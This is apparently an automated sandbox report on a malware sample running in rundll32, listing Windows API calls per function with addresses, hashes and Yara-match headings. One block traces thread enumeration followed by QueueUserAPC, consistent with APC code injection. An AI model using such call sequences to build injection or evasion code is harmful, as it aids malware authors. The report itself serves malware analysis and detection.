                            • InterlockedExchange.KERNEL32(04F8A128,00000000), ref: 04F73E63
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F73EA4
                              • Part of subcall function 04F7E3CD: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04F7E3F6
                              • Part of subcall function 04F7E3CD: memcpy.NTDLL(00000000,?,?), ref: 04F7E409
                              • Part of subcall function 04F7E3CD: RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F7E41A
                              • Part of subcall function 04F7E3CD: RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F7E42F
                              • Part of subcall function 04F7E3CD: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04F7E467
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                            • String ID:
                            • API String ID: 4198405257-0
                            • Opcode ID: 04991c53a682fd02c0507bd3405ab54f448574db6fbbb063104d41628beaa61e
                            • Instruction ID: 735edd3261d615f63ea47cf83c32ea50cb19fcc1a9bbc1690fe2c57f1569d5b5
                            • Opcode Fuzzy Hash: 04991c53a682fd02c0507bd3405ab54f448574db6fbbb063104d41628beaa61e
                            • Instruction Fuzzy Hash: 6E611B72A0020DFFDB11DFA5EC84EAA7BA9EB04304F04846EF915DB250D778E956DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001,?,?,?,?,?,?,?,04F69100,?), ref: 04F78D13
                            • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78D1D
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78D46
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78D54
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78D62
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78D70
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78D7E
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78D8C
                            • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 04F78DB6
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,04F69100,?), ref: 04F78E37
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load$Library$AllocDll@4FreeHeapImports
                            • String ID:
                            • API String ID: 1792504554-0
                            • Opcode ID: 201f828b6beb9dfdd4bc5483743ffd7722ec2b7f04721b45897d38ce8a6c765f
                            • Instruction ID: ebf54ed28a7a9c166c3d7c137d7ff3502e41d5167aa1c0962b2e28ba2006597b
                            • Opcode Fuzzy Hash: 201f828b6beb9dfdd4bc5483743ffd7722ec2b7f04721b45897d38ce8a6c765f
                            • Instruction Fuzzy Hash: 62411871E00619EFDB01EFA8E888DA977E8EB08204B1444ABF609DF241D379BD468F50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F62F91: memset.NTDLL ref: 04F62FB3
                              • Part of subcall function 04F62F91: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 04F6305D
                            • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 04F7E903
                            • CloseHandle.KERNEL32(?), ref: 04F7E90F
                            • PathFindFileNameW.SHLWAPI(?), ref: 04F7E91F
                            • lstrlenW.KERNEL32(00000000), ref: 04F7E928
                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F7E939
                            • wcstombs.NTDLL ref: 04F7E948
                            • lstrlen.KERNEL32(?), ref: 04F7E955
                            • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?), ref: 04F7E994
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7E9A7
                            • DeleteFileW.KERNEL32(?), ref: 04F7E9B4
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                            • String ID:
                            • API String ID: 2256351002-0
                            • Opcode ID: ce582a355dd951f20757058a0c123075d018855a70c50661414e3464aa2e5d12
                            • Instruction ID: 4eaf621c048567a77453e7eb85d3821319e03dd56b474f090257fe147da19d17
                            • Opcode Fuzzy Hash: ce582a355dd951f20757058a0c123075d018855a70c50661414e3464aa2e5d12
                            • Instruction Fuzzy Hash: 27316E36900209BFDB219FA5ED48DAF7FB9EF45315F00006AF901AA150DB39AD15DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetTickCount.KERNEL32 ref: 04F7B9F9
                            • CreateFileW.KERNEL32(04F70971,80000000,00000003,04F8A1E8,00000003,00000000,00000000,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BA16
                            • GetLastError.KERNEL32(?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BABE
                              • Part of subcall function 04F8087A: lstrlen.KERNEL32(?,00000000,04F7BA3E,00000027,04F8A1E8,?,00000000,?,?,04F7BA3E,?,00000001,?,04F70971,00000000,?), ref: 04F808B0
                              • Part of subcall function 04F8087A: lstrcpy.KERNEL32(00000000,00000000), ref: 04F808D4
                              • Part of subcall function 04F8087A: lstrcat.KERNEL32(00000000,00000000), ref: 04F808DC
                            • GetFileSize.KERNEL32(04F70971,00000000,?,00000001,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BA49
                            • CreateFileMappingA.KERNEL32(04F70971,04F8A1E8,00000002,00000000,00000000,04F70971), ref: 04F7BA5D
                            • lstrlen.KERNEL32(04F70971,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BA79
                            • lstrcpy.KERNEL32(?,04F70971), ref: 04F7BA89
                            • GetLastError.KERNEL32(?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BA91
                            • HeapFree.KERNEL32(00000000,04F70971,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BAA4
                            • CloseHandle.KERNEL32(04F70971,?,00000001,?,04F70971), ref: 04F7BAB6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                            • String ID:
                            • API String ID: 194907169-0
                            • Opcode ID: 870a44ff8c9e4ef9f74851774627eed9c6df887f31ff9487dd3bb40d60219d84
                            • Instruction ID: 9cfef4f5914852ae5ff7502872d48377a3a3e5855e070a7e5bb28c4b8d8f2d1c
                            • Opcode Fuzzy Hash: 870a44ff8c9e4ef9f74851774627eed9c6df887f31ff9487dd3bb40d60219d84
                            • Instruction Fuzzy Hash: 18210A71900209FFDB10AFA4EC48AAE7FB8EF05354F10846AF915EA250D338AE459B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 04F6EE2A
                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 04F6EE36
                            • GetModuleHandleA.KERNEL32(?,0631978E,00000000,?,00000000), ref: 04F6EE56
                            • GetProcAddress.KERNEL32(00000000), ref: 04F6EE5D
                            • Thread32First.KERNEL32(?,0000001C), ref: 04F6EE6D
                            • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 04F6EE88
                            • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 04F6EE99
                            • CloseHandle.KERNEL32(00000000), ref: 04F6EEA0
                            • Thread32Next.KERNEL32(?,0000001C), ref: 04F6EEA9
                            • CloseHandle.KERNEL32(?), ref: 04F6EEB5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                            • String ID:
                            • API String ID: 2341152533-0
                            • Opcode ID: ad9d1f3139390f357031115611009873051e25bde934e4f67e2b365fabbb1963
                            • Instruction ID: c99f7a85d281ddfb8b4ad6f3ecd18ca76d740e9223b9856fa24f2b50af3f4d3c
                            • Opcode Fuzzy Hash: ad9d1f3139390f357031115611009873051e25bde934e4f67e2b365fabbb1963
                            • Instruction Fuzzy Hash: D8214F76A0010CFFDF01AFE4EC84DEE7BB9EB18359B05412AF601AA150D735AD46DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetEvent.KERNEL32(00000000,?,04F7507B), ref: 04F6DC56
                              • Part of subcall function 04F75D52: InterlockedExchange.KERNEL32(?,000000FF), ref: 04F75D59
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,04F7507B), ref: 04F6DC76
                            • CloseHandle.KERNEL32(00000000,?,04F7507B), ref: 04F6DC7F
                            • CloseHandle.KERNEL32(00000000,?,?,04F7507B), ref: 04F6DC89
                            • RtlEnterCriticalSection.NTDLL(?), ref: 04F6DC91
                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04F6DCA9
                            • Sleep.KERNEL32(000001F4), ref: 04F6DCB8
                            • CloseHandle.KERNEL32(00000000), ref: 04F6DCC5
                            • LocalFree.KERNEL32(?), ref: 04F6DCD0
                            • RtlDeleteCriticalSection.NTDLL(?), ref: 04F6DCDA
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                            • String ID:
                            • API String ID: 1408595562-0
                            • Opcode ID: dfcecab49b5f2603d53174534d3abfffd6ae0cbfb7a3c7baea65c082d022392b
                            • Instruction ID: 3e850d779d645c021b6e2e3f58c32087d34ea3786bba3f17ca9c0f1ef1c96aed
                            • Opcode Fuzzy Hash: dfcecab49b5f2603d53174534d3abfffd6ae0cbfb7a3c7baea65c082d022392b
                            • Instruction Fuzzy Hash: F4119A71A00B1EEBCB206F65ED4896ABBB8FF047443140919F18396450DB79F802CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,04F63DA2,00000000,00000001,?,?,?), ref: 04F6DD92
                            • lstrlen.KERNEL32(?), ref: 04F6DDA2
                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F6DDD6
                            • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 04F6DE01
                            • memcpy.NTDLL(00000000,?,?), ref: 04F6DE20
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F6DE81
                            • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 04F6DEA3
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Allocatelstrlenmemcpy$Free
                            • String ID: W
                            • API String ID: 3204852930-655174618
                            • Opcode ID: 0045c674473426be05a4880a66c01308a2d723ebfebf03881f74175586139272
                            • Instruction ID: 5fe7b28ed58f629918c5ab3a97ca8e5e60abb1db9f3849143bf8c5aa3236bd24
                            • Opcode Fuzzy Hash: 0045c674473426be05a4880a66c01308a2d723ebfebf03881f74175586139272
                            • Instruction Fuzzy Hash: 14414B72E0020EEFDF11DF54DC80AAE7BB9FF64348F144469E915AB210E734AA559BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F6D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,04F7DD0F,00000000,00000000,00000004,00000000,?,04F6DBAC,?,?,00000000), ref: 04F6D435
                              • Part of subcall function 04F6D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F7DD0F,00000000,00000000,00000004,00000000,?,04F6DBAC,?), ref: 04F6D493
                              • Part of subcall function 04F6D429: lstrcpy.KERNEL32(00000000,00000000), ref: 04F6D4A3
                            • lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 04F6A153
                            • wsprintfA.USER32 ref: 04F6A181
                            • lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 04F6A1DF
                            • GetLastError.KERNEL32 ref: 04F6A1F6
                            • ResetEvent.KERNEL32(?), ref: 04F6A20A
                            • ResetEvent.KERNEL32(?), ref: 04F6A20F
                            • GetLastError.KERNEL32 ref: 04F6A227
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
                            • String ID: `
                            • API String ID: 2276693960-1850852036
                            • Opcode ID: c9aff2d8f04db72773f52996ee6b8bce2071b42aae6c0ae073fb18d18cfe724b
                            • Instruction ID: 52f29b812256f3d47c767c89e57f0c916e88262f31d40419a2347f54b169a582
                            • Opcode Fuzzy Hash: c9aff2d8f04db72773f52996ee6b8bce2071b42aae6c0ae073fb18d18cfe724b
                            • Instruction Fuzzy Hash: 6C418F7190060AEFDF11DFA4ED48BAE7BB8FF05314F00445AF912A6150E775EA15CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(04F643C6,00000000,?,?,?,?,04F643C6,00000035,00000000,?,00000000), ref: 04F631A2
                            • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04F631B8
                            • memcpy.NTDLL(00000010,04F643C6,00000000,?,?,04F643C6,00000035,00000000), ref: 04F631EE
                            • memcpy.NTDLL(00000010,00000000,00000035,?,?,04F643C6,00000035), ref: 04F63209
                            • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 04F63227
                            • GetLastError.KERNEL32(?,?,04F643C6,00000035), ref: 04F63231
                            • HeapFree.KERNEL32(00000000,00000000,?,?,04F643C6,00000035), ref: 04F63254
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                            • String ID: (
                            • API String ID: 2237239663-3887548279
                            • Opcode ID: dd2e03d16b38cc101eb25112f960984f4270adc432708bb8578d0da489c67cbe
                            • Instruction ID: e5b830010ad16a6178c49b53b0952430d27ab46cf9dfe2a6884cec5e02720fb3
                            • Opcode Fuzzy Hash: dd2e03d16b38cc101eb25112f960984f4270adc432708bb8578d0da489c67cbe
                            • Instruction Fuzzy Hash: C7316136900209FFDB21CF95EC45AAB7BB8FB44754F044429FD46E6210D234AE55DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL ref: 04F77777
                            • memset.NTDLL ref: 04F7778B
                              • Part of subcall function 04F81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
                              • Part of subcall function 04F81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
                              • Part of subcall function 04F81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
                              • Part of subcall function 04F81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
                            • GetCurrentThreadId.KERNEL32 ref: 04F77818
                            • GetCurrentThread.KERNEL32 ref: 04F7782B
                            • RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F778D2
                            • Sleep.KERNEL32(0000000A), ref: 04F778DC
                            • RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F77902
                            • HeapFree.KERNEL32(00000000,?), ref: 04F77930
                            • HeapFree.KERNEL32(00000000,00000018), ref: 04F77943
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                            • String ID:
                            • API String ID: 1146182784-0
                            • Opcode ID: 3615f369218ce2d3e8e5353fff6c72f99cf2688314a6a5db316f162a89454ef0
                            • Instruction ID: 0573e96a5b524f112f3a247e4492aec505c3b0316fb454c0e05b68c40795f3fd
                            • Opcode Fuzzy Hash: 3615f369218ce2d3e8e5353fff6c72f99cf2688314a6a5db316f162a89454ef0
                            • Instruction Fuzzy Hash: 225129B1A04745AFD710EF64E88486ABBF8FB48344F104D2EF585DB211D738ED4A9B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F770C3: RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F770CB
                              • Part of subcall function 04F770C3: RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F770E0
                              • Part of subcall function 04F770C3: InterlockedIncrement.KERNEL32(0000001C), ref: 04F770F9
                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 04F7284F
                            • memset.NTDLL ref: 04F72860
                            • lstrcmpi.KERNEL32(?,?), ref: 04F728A0
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F728CC
                            • memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,04F78974), ref: 04F728E0
                            • memset.NTDLL ref: 04F728ED
                            • memcpy.NTDLL(-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04F72906
                            • memcpy.NTDLL(-00000005,?,00000007,-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04F72929
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,04F78974), ref: 04F72946
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                            • String ID:
                            • API String ID: 694413484-0
                            • Opcode ID: ce0cbcd4d8db12ef2c0019bbade86463604369ac84d86170ccdf52346632b4b4
                            • Instruction ID: 3119319747f3c8f8aed0ba8d8c91f92e10178e0ef6c11bf1c49266807b36ba96
                            • Opcode Fuzzy Hash: ce0cbcd4d8db12ef2c0019bbade86463604369ac84d86170ccdf52346632b4b4
                            • Instruction Fuzzy Hash: 9641A072E00219FFDB109FA4EC84BADBBB9FF08314F15406AE505AB251D739AE469B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000,?,?), ref: 04F7C9CC
                            • lstrlen.KERNEL32(?), ref: 04F7C9D4
                            • lstrlen.KERNEL32(?), ref: 04F7CA3F
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F7CA6A
                            • memcpy.NTDLL(00000000,00000002,?), ref: 04F7CA7B
                            • memcpy.NTDLL(00000000,?,?), ref: 04F7CA91
                            • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 04F7CAA3
                            • memcpy.NTDLL(00000000,04F853E8,00000002,00000000,?,?,00000000,?,?), ref: 04F7CAB6
                            • memcpy.NTDLL(00000000,?,00000002), ref: 04F7CACB
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$lstrlen$AllocateHeap
                            • String ID:
                            • API String ID: 3386453358-0
                            • Opcode ID: c9e805d998b9dfc325079aa665e5ae69ff7b666ba29d39f647f8bc4303c78966
                            • Instruction ID: 50b04cfdf668b3fbce458db5483ce0ee5b682d90a98f7925eb6e5443c395a883
                            • Opcode Fuzzy Hash: c9e805d998b9dfc325079aa665e5ae69ff7b666ba29d39f647f8bc4303c78966
                            • Instruction Fuzzy Hash: 6F415076D0021AFBDF00DFA8CC80A9EBBB8EF48315F14405AE905A7201E775EA51DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F770C3: RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F770CB
                              • Part of subcall function 04F770C3: RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F770E0
                              • Part of subcall function 04F770C3: InterlockedIncrement.KERNEL32(0000001C), ref: 04F770F9
                            • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04F660AC
                            • lstrlen.KERNEL32(00000008,?,?,?,04F7F140,00000000,00000000,-00000008), ref: 04F660BB
                            • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 04F660CD
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,04F7F140,00000000,00000000,-00000008), ref: 04F660DD
                            • memcpy.NTDLL(00000000,-00000008,00000000,?,?,?,04F7F140,00000000,00000000,-00000008), ref: 04F660EF
                            • lstrcpy.KERNEL32(00000020), ref: 04F66121
                            • RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F6612D
                            • RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F66185
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                            • String ID:
                            • API String ID: 3746371830-0
                            • Opcode ID: c180e473ab0f76a113bd9cee75b81bd0d53e2c0cfc32bc2bd976367555ae66a6
                            • Instruction ID: c5a5cf44da5a0a09dc47b321d44d434d284ce226dc2bcd36a0df6fc735b803d9
                            • Opcode Fuzzy Hash: c180e473ab0f76a113bd9cee75b81bd0d53e2c0cfc32bc2bd976367555ae66a6
                            • Instruction Fuzzy Hash: 8D417671900709EFEB219F54E844B6ABBF8FF08704F10851EE80A9A212D739A955DF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F75119: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F7514B
                              • Part of subcall function 04F75119: HeapFree.KERNEL32(00000000,00000000,?,?,04F7FC0D,?,00000022,00000000,00000000,00000000,?,?), ref: 04F75170
                              • Part of subcall function 04F779A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,04F7FC2E,?,?,?,?,?,00000022,00000000,00000000), ref: 04F779DC
                              • Part of subcall function 04F779A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,04F7FC2E,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 04F77A2F
                            • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 04F7FC63
                            • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 04F7FC6B
                            • lstrlen.KERNEL32(?), ref: 04F7FC75
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F7FC8A
                            • wsprintfA.USER32 ref: 04F7FCC6
                            • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 04F7FCE5
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7FCFA
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7FD07
                            • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 04F7FD15
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                            • String ID:
                            • API String ID: 168057987-0
                            • Opcode ID: 8faca9da266c505adb8040312597e1d4d21fa3779e8d7da8417b01098c45284f
                            • Instruction ID: 2df63915ee23934bc69635dbbca9b5d97acbbcc6557ee3f2d9bf608cfdad443d
                            • Opcode Fuzzy Hash: 8faca9da266c505adb8040312597e1d4d21fa3779e8d7da8417b01098c45284f
                            • Instruction Fuzzy Hash: 8831A131A00319BFDB11AF64EC44E6BBFE9EF44314F00082AF954AA151D778AD199BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 04F6F3DB
                            • GetLastError.KERNEL32 ref: 04F6F3E5
                            • WaitForSingleObject.KERNEL32(000000C8), ref: 04F6F40A
                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 04F6F42D
                            • SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 04F6F455
                            • WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 04F6F46A
                            • SetEndOfFile.KERNEL32(00001000), ref: 04F6F477
                            • GetLastError.KERNEL32 ref: 04F6F483
                            • CloseHandle.KERNEL32(00001000), ref: 04F6F48F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                            • String ID:
                            • API String ID: 2864405449-0
                            • Opcode ID: bcf7d962fb70cd833fc0808e5b6754f98378131d9f006422ac3ee30b19624472
                            • Instruction ID: f3228c06a9fd744709d40eed21b9c166baa8520cb4560007dd5c2de558a24fcf
                            • Opcode Fuzzy Hash: bcf7d962fb70cd833fc0808e5b6754f98378131d9f006422ac3ee30b19624472
                            • Instruction Fuzzy Hash: 85316D7190020CBFEB10DFA9EC49BAE7BB8EF04325F208155F912A61D0D7749E55DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,04F65674,00000008,?,00000010,00000001,00000000,0000003A), ref: 04F806AC
                            • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 04F806E0
                            • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 04F806E8
                            • GetLastError.KERNEL32 ref: 04F806F2
                            • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 04F8070E
                            • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 04F80727
                            • CancelIo.KERNEL32(?), ref: 04F8073C
                            • CloseHandle.KERNEL32(?), ref: 04F8074C
                            • GetLastError.KERNEL32 ref: 04F80754
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                            • String ID:
